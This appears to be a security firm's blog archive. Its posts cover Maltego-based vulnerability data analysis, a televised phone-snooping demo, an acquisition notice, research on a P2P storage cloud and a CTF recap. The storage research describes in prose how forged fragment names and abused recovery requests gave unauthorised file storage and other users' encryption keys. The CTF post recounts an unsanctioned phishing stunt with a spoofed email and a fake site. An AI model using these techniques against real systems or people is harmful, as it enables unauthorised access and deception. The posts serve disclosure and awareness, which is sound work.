Grey bar Blue bar
Share this:

Fri, 13 Jun 2014

Using Maltego to explore threat & vulnerability data

This blog post is about the process we went through trying to better interpret the masses of scan results that automated vulnerability scanners and centralised logging systems produce. A good example of the value in getting actionable items out of this data is the recent Target compromise. Their scanning solutions detected the threat that lead to their compromise, but no humans intervened. It's suspected that too many security alerts were being generated on a regular basis to act upon.


The goal of our experiment was to steer away from the usual data interrogation questions of "What are the top N vulnerabilities my scanner has flagged with a high threat?" towards questions like "For how many of my vulnerabilities do public exploits exist?". Near the end of this exercise we stumbled across this BSides talk "Stop Fixing All The Things". Theses researchers took a similar view-point: "As security practitioners, we care about which vulnerabilities matter". Their blog post and video are definitely worth having a look at.


At SensePost we have a Managed Vulnerability Scanning service (MVS). It incorporates numerous scanning agents (e.g. Nessus, Nmap, Netsparker and a few others), and exposes an API to interact with the results. This was our starting point to explore threat related data. We could then couple this data with remote data sources (e.g. CVE data, exploit-db.com data).


We chose to use Maltego to explore the data as it's an incredibly powerful data exploration and visualisation tool, and writing transforms is straight forward. If you'd like to know more about Maltego here are some useful references:


What we ended up building were:

  • Transforms to explore our MVS data

  • A CVE / exploit-db.com API engine

  • Transforms to correlate between scanner data and the created APIs

  • Maltego Machines to combine our transforms


So far our API is able to query a database populated from CVE XML files and data from www.exploit-db.com (they were kind enough to give us access to their CVE inclusive data set). It's a standalone Python program that pulls down the XML files, populates a local database, and then exposes a REST API. We're working on incorporating other sources - threat feeds, other logging/scanning systems. Let us know if you have any ideas. Here's the API in action:


Parsing CVE XML data and exposing REST API
Parsing CVE XML data and exposing REST API


Querying a CVE. We see 4 public exploits are available.
Querying a CVE. We see 4 public exploits are available.


It's also worth noting that for the demonstrations that follow we've obscured our clients' names by applying a salted 'human readable hash' to their names. A side effect is that you'll notice some rather humorous entries in the images and videos that follow.


Jumping into the interesting results, these are some of the tasks that we can perform:


  • Show me all hosts that have a critical vulnerability within the last 30 days

  • Show me vulnerable hosts for which public exploit code exists

  • Show me all hosts for which a vulnerability exists that has the word 'jmx-console' in the description

  • Show me all hosts on in my DMZ that have port 443 open

  • Given a discovered vulnerability on a host, show me all other hosts with the same vulnerability

  • Show me a single diagram depicting every MVS client, weighted by the threat of all scans within the last week

  • Show me a single diagram depicting every MVS client, weighted by the availability of public exploit code

  • Given a CPE, show me all hosts that match it


Clicking the links in the above scenarios will display a screenshot of a solution. Additionally, two video demonstrations with dialog are below.


Retrieving all recent vulnerabilities for a client 'Bravo Tango', and checking one of them to see if there's public exploit code available.
Retrieving all recent vulnerabilities for a client 'Bravo Tango', and checking one of them to see if there's public exploit code available.


Exploring which clients/hosts have which ports open
Exploring which clients/hosts have which ports open


In summary, building 'clever tools' that allow you to combine human insight can be powerful. An experiences analyst with the ability to ask the right questions, and building tools that allows answers to be easily extracted, yields actionable tasks in less time. We're going to start using this approach internally to find new ways to explore the vulnerability data sets of our scanning clients and see how it goes.


In the future, we're working on incorporating other data sources (e.g. LogRhythm, Skybox). We're also upgrading our MVS API - you'll notice a lot of the Maltego queries are cumbersome and slow due to its current linear exploration approach.


The source code for the API, the somewhat PoC Maltego transforms, and the MVS (BroadView) API can be downloaded from our GitHub page, and the MVS API from here. You'll need a paid subscription to incorporate the exploit-db.com data, but it's an initiative definitely worth supporting with a very fair pricing model. They do put significant effort in correlating CVEs. See this page for more information.


Do get in touch with us (or comment below) if you'd like to know more about the technical details, chat about the API (or expand on it), if this is a solution you'd like to deploy, or if you'd just like to say "Hi".

Thu, 12 Dec 2013

Never mind the spies: the security gaps inside your phone

For the last year, Glenn and I have been obsessed with our phones; especially with regard to the data being leaked by a device that is always with you, powered on and often provided with a fast Internet connection. From this obsession, the Snoopy framework was born and released.


After 44con this year, Channel 4 contacted us to be part of a new experimental show named 'Data Baby', whose main goal is to grab ideas from the security community, and transform them into an easy-to-understand concept screened to the public during the 7 o'clock news.


Their request was simple: Show us the real threat!


To fulfil their request, we setup Snoopy to intercept, profile and access data from a group of "victim" students at a location in Central London. While this is something we've done extensively over the past twelve months, we've never had to do it with a television crew and cameras watching your every move!


The venue, Evans and Peel Detective Agency, added to the sinister vibe with their offices literally located underground. We were set up in a secret room behind a book case like friggin spies and got the drones ready for action. As the students arrived, we had a single hour to harvest as much information as we could. Using Snoopy, Maltego and a whole lot of frantic clicks and typing (hacking under stress is not easy), we were filmed gaining access to their inbox's and other personal information.


In the end, Snoopy and Maltego delivered the goods and Glenn added a little charm for the ladies.



After the segment was aired, we participated in a live Twitter Q&A session with viewers (so, so many viewers, we had to tag in others to help reply to all the tweets) and gave advice on how they could prevent themselves from being the next victim. Our advice to them, and indeed anyone else concerned is:


How to avoid falling foul of mobile phone snooping
- Be discerning about when you switch Wi-Fi on
- Check which Wi-Fi network you're connecting to; if you're connecting to Starbucks when you're nowhere near a branch, something's wrong
- Download the latest updates for your phone's operating system, and keep the apps updated too
- Check your application providers (like e-mail) security settings to make sure all your email traffic is "encrypted", not just the login process
- Tell your phone to forget networks once you're done with them, and be careful about joining "open" aka "unencrypted" networks

Fri, 1 Nov 2013

A new owner for a new chapter

We're pleased to announce our acquisition today by SecureData Europe.


SecureData (www.secdata.com) is a complete independent security services provider based in the UK and was also previously part of the SecureData Holdings group before being acquired by management in November 2012. The strategic acquisition complements SecureData's vision for enabling an end-to-end, proactive approach to security for global customers by assessing risk, detecting threats in real-time, protecting valuable assets and responding to security issues when they occur.


This deal signals the culmination of a long period of negotiation between SecureData Holdings, SecureData Europe and SensePost management and represents a cordial and amicable arrangement that is considered to be to the benefit of all three businesses. As the management of SensePost we are fully committed to this change, which we believe is in the best interests of SensePost, our staff and our customers. We believe this move will herald for us a new era of growth and development that will see us better equipped and prepared to meet the requirements of the market and fulfil our mission of providing insight, information and systems that enable our customers to make informed decisions about information security.


We look forward to a to an exciting period of innovation, growth and development that we believe this transaction will ultimately enable!

Fri, 12 Apr 2013

Analysis of Security in a P2P storage cloud

A cloud storage service such as Microsoft SkyDrive requires building data centers as well as operational and maintenance costs. An alternative approach is based on distributed computing model which utilizes portion of the storage and processing resources of consumer level computers and SME NAS devices to form a peer to peer storage system. The members contribute some of their local storage space to the system and in return receive "online backup and data sharing" service. Providing data confidentiality, integrity and availability in such de-centerlized storage system is a big challenge to be addressed. As the cost of data storage devices declines, there is a debate that whether the P2P storage could really be cost saving or not. I leave this debate to the critics and instead I will look into a peer to peer storage system and study its security measures and possible issues. An overview of this system's architecture is shown in the following picture:


Each node in the storage cloud receives an amount of free online storage space which can be increased by the control server if the node agrees to "contribute" some of its local hard drive space to the system. File synchronisation and contribution agents that are running on every node interact with the cloud control server and other nodes as shown in the above picture. Folder/File synchronisation is performed in the following steps:



1) The node authenticates itself to the control server and sends file upload request with file meta data including SHA1 hash value, size, number of fragments and file name over HTTPS connection.


2) The control server replies with the AES encryption key for the relevant file/folder, a [IP Address]:[Port number] list of contributing nodes called "endpoints list" and a file ID.


3) The file is split into blocks each of which is encrypted with the above AES encryption key. The blocks are further split into 64 fragments and redundancy information also gets added to them.


4) The node then connects to the contribution agent on each endpoint address that was received in step 2 and uploads one fragment to each of them


Since the system nodes are not under full control of the control server, they fall offline any time or the stored file fragments may become damaged/modified intentionally. As such, the control server needs to monitor node and fragment health regularly so that it may move lost/damaged fragments to alternate nodes if need be. For this purpose, the contribution agent on each node maintains an HTTPS connection to the control server on which it receives the following "tasks":


a) Adjust settings : instructs the node to modify its upload/download limits , contribution size and etc


b) Block check : asks the node to connect to another contribution node and verify a fragment existence and hash value


c) Block Recovery : Assist the control server to recover a number of fragments


By delegating the above task, the control system has placed some degree of "trust" or at least "assumptions" about the availability and integrity of the agent software running on the storage cloud nodes. However, those agents can be manipulated by malicious nodes in order to disrupt cloud operations, attack other nodes or even gain unauthorised access to the distributed data. I limited the scope of my research to the synchronisation and contribution agent software of two storage nodes under my control - one of which was acting as a contribution node. I didn't include the analysis of the encryption or redundancy of the system in my preliminary research because it could affect the live system and should only be performed on a test environment which was not possible to set up, as the target system's control server was not publicly available. Within the contribution agent alone, I identified that not only did I have unauthorised access file storage (and download) on the cloud's nodes, but I had unauthorised access to the folder encryption keys as well.


a) Unauthorised file storage and download


The contribution agent created a TCP network listener that processed commands from the control server as well as requests from other nodes. The agent communicated over HTTP(s) with the control server and other nodes in the cloud. An example file fragment upload request from a remote node is shown below:



Uploading fragments with similar format to the above path name resulted in the "bad request" error from the agent. This indicated that the fragment name should be related to its content and this condition is checked by the contribution agent before accepting the PUT request. By decompiling the agent software code, it was found that the fragment name must have the following format to pass this validation:


<SHA1(uploaded content)>.<Fragment number>.<Global Folder Id>


I used the above file fragment format to upload notepad.exe to the remote node successfully as you can see in the following figure:



The download request (GET request) was also successful regardless of the validity of "Global Folder Id" and "Fragment Number". The uploaded file was accessible for about 24 hours, until it was purged automatically by the contribution agent, probably because it won't receive any "Block Check" requests for the control server for this fragment. Twenty four hours still is enough time for malicious users to abuse storage cloud nodes bandwidth and storage to serve their contents over the internet without victim's knowledge.


b) Unauthorised access to folder encryption keys


The network listener responded to GET requests from any remote node as mentioned above. This was intended to serve "Block Check" commands from the control server which instructs a node to fetch a number of fragments from other nodes (referred to as "endpoints") and verify their integrity but re-calculating the SHA1 hash and reporting back to the control server. This could be part of the cloud "health check" process to ensure that the distributed file fragments are accessible and not tampered with. The agent could also process "File Recovery" tasks from the control server but I didn't observe any such command from the control server during the dynamic analysis of the contribution agent, so I searched the decompiled code for clues on the file recovery process and found the following code snippet which could suggest that the agent is cable of retrieving encryption keys from the control server. This was something odd, considering that each node should only have access to its own folders encryption keys and it stores encrypted file fragments of other nodes.


One possible explanation for the above file recovery code, could be that the node first downloads its own file fragments from remote endpoints (using an endpoint list received from the control server) and then retrieves the required folder encryption key from the control server in order to decrypt and re-assemble its own files. In order to test if it's possible to abuse the file recovery operation to gain access to encryption key of the folders belonging to other nodes. I extracted the folderInfo request format from the agent code and set up another storage node as a target to test this idea. The result of the test was successful as shown in the following figure and it was possible to retrieve the AES-256 encryption key for the Folder Id "1099869693336". This could enable an attacker who has set up an contributing storage node to decrypt the fragments that belong to other cloud users.



Conclusion:


While peer to peer storage systems have lower setup/maintenance costs, they face security threats from the storage nodes that are not under direct physical/remote control of the cloud controller system. Examples of such threats relate to the cloud's client agent software and the cloud server's authorisation control, as demonstrated in this post. While analysis of the data encryption and redundancy in the peer to peer storage system would be an interesting future research topic, we hope that the findings from this research can be used to improve the security of various distributed storage systems.

Tue, 11 Dec 2012

CSIR Cyber Games

The Council for Scientific and Industrial Research (CSIR) recently hosted the nation Cyber Games Challenge as part of Cyber Security Awareness month. The challenge pit teams of 4-5 members from different institutes against each other in a Capture the Flag style contest. In total there were seven teams, with two teams from Rhodes university, two from the University of Pretoria and three teams from the CSIR.


The games were designed around an attack/defence scenario, where teams would be given identical infrastructure which they could then patch against vulnerabilities and at the same time identify possible attack vectors to use against rival teams. After the initial reconnaissance phase teams were expected to conduct a basic forensic investigation to find 'flags' hidden throughout their systems. These 'flags' were hidden in images, pcap files, alternative data streams and in plain sight.


It was planned that teams would then be given access to a few web servers to attack and deface, gain root, patch and do other fun things to. Once this phase was complete the system would be opened up and the 'free-for-all' phase would see teams attacking each others systems. Teams would lose points for each service that was rendered inaccessible. Unfortunately due to technical difficulties the competition did not go as smoothly as initially planned. Once the games started the main website was rendered unusable almost immediately due to teams DirBuster to enumerate the competition scoring system. The offending teams were asked to cease their actions and the games proceeding from there. Two teams were disqualified after not ceasing their attacks on official infrastructure. Once teams tried to access their virtual infrastructure new problems arose, with only the two teams from Rhodes being able to access the ESX server while the rest of the teams based at the CSIR had no connectivity. This was rectified, at a cost, resulting in all teams except for the two Rhodes teams having access to their infrastructure. After a few hours of struggle it was decided to scrap the attack/defence part of the challenge. Teams were awarded points for finding hidden flags, with the most basic flag involving 'decoding' a morse-code pattern or a phrase 'encrypted' using a quadratic equation. It was unfortunate that the virtual infrastructure did not work as planned as this was to be the main focus of the games and sadly without it many teams were left with very little to do in the time between new 'flag' challenges being released.


In the days prior to the challenge our team, team Blitzkrieg, decided to conduct a social engineering exercise. We expected this to add to the spirit of the games and to introduce a little friendly rivalry between the teams prior to the games commencing. A quick google search for "CSIR Cyber Games" revealed a misconfigured cyber games server that had been left exposed on a public interface. Scrapping this page for information allowed us to create a fake Cyber Games site. A fake Twitter account was created on behalf of the CSIR Cyber Games organisers and used to tweet little titbits of disinformation. Once we had set-up our fake site and twitter account, a spoofed email in the name of the games organiser was sent out to all the team captains. Teams were invited to follow our fake user on twitter and to register on our cyber games page. Unfortunately this exercise did not go down too well with the games organisers and our team was threatened with disqualification or starting the games on negative points. In hindsight we should have run this by the organisers first to insure that it was within scope. After the incident we engaged with the organisers to explain our position and intentions, they were very understanding and decided to not disqualify us and waver any point based penalty. As part of our apology, we agreed to submit a few challenges for next years Cyber Games.


Overall we believe concept of using structured Cyber Games to promote security awareness is both fun and useful. While the games were hampered by network issues there was enough content available to make for an entertaining and exciting afternoon. The rush of solving challenges as fast as possible and everyone communicating ideas made for an epic day. In closing, the CSIR Cyber Games was a success, as with all things we believe it will improve over time and provide a good platform to promote security awareness.


For the defacement phase of the games we made a old school defacement page.